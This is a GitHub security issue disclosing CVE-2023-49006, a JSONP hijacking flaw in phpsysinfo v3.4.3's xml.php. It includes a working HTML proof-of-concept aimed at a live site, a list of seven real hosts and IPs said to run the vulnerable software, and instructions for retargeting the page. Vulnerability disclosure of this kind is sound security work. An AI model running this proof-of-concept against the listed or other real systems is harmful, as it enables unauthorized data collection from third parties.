Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

XML.php JSONP hijacking in phpsysinfo v3.4.3 #5

Open
Hebing123 opened this issue Dec 15, 2023 · 1 comment
Open

XML.php JSONP hijacking in phpsysinfo v3.4.3 #5

Hebing123 opened this issue Dec 15, 2023 · 1 comment

Comments

@Hebing123
Copy link
Owner

Hebing123 commented Dec 15, 2023
edited
Loading

Description

phpsysinfo v3.4.3 has JSONP vulnerability.The XML.php file has a JSONP hijacking vulnerability. When a user visits a page carefully crafted by the attacker, the JSON data is obtained and sent to the attacker.

Proof of Concept

We created an HTML file as a proof of concept to showcase the vulnerability. This HTML file will attempt to retrieve the JSON data from https://phpbb.trabitechnik.com/xml.php and display it in a pop-up window.

Of course, in a real-world attack, an attacker would simply use a PHP file to send the retrieved JSON data to their server using an XMLHttpRequest.

Here is the HTML code for the proof of concept file:

<!DOCTYPE html> 
<html> 
<head> 
<meta charset="utf-8"> 
<title></title> 
<script src="http://apps.bdimg.com/libs/jquery/1.10.2/jquery.min.js"></script> 
</head> 
<body> 
<script> 
function dezsbrxdio(data){ alert(JSON.stringify(data)); } 
</script> 
<script src="https://phpbb.trabitechnik.com/xml.php?json&callback=dezsbrxdio&jsonp=dezsbrxdio&cb=dezsbrxdio&json=dezsbrxdio">
</script> 
</body>
 </html>

Here are some online assets using phpsysinfo that I have found:
https://server.wxp-3.nl/xml.php
https://sysinfo.pouserinet.fi/xml.php
https://zvoyc1uy16u7hu9e.myfritz.net/xml.php
http://204.11.55.179/xml.php
http://204.11.55.87/xml.php
http://88.67.242.79/xml.php
http://217.131.251.40/xml.php

If we want to easily test whether a website is vulnerable to this exploit, we can simply replace "phpbb.trabitechnik.com" in the HTML file(POC) with the URL of the website we want to test. We can open the modified HTML file and check if a pop-up window is displayed with the JSON data retrieved from the website. If a pop-up window appears with the JSON data, then the website is vulnerable to the JSONP hijacking exploit.

Impact

If a website's internal network information or other sensitive data is exposed through JSONP and vulnerable to hijacking, the consequences could be severe.

An attacker could potentially retrieve sensitive information such as IP addresses, server names, network topologies, and other data that could be used to map out the internal network structure. This information could then be used to identify additional targets within the network and launch more targeted attacks.

In addition, if the website is part of a larger system or network, the attacker could use the information obtained through JSONP hijacking to gain access to other systems or sensitive data within the network.

Overall, the potential consequences of JSONP hijacking are significant and can lead to a range of security issues and data breaches. It is important for website administrators to ensure that their systems are not vulnerable to this exploit and to take appropriate measures to mitigate the risk.

benharvie marked this as fixed in 4f2cee505e4f2e9b369a321063ff2c5e0c34ba45 with commit 4f2cee 4 months ago
@Hebing123
Copy link
Owner Author

This is the vulnerability exploitation reference for CVE-2023-49006.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@Hebing123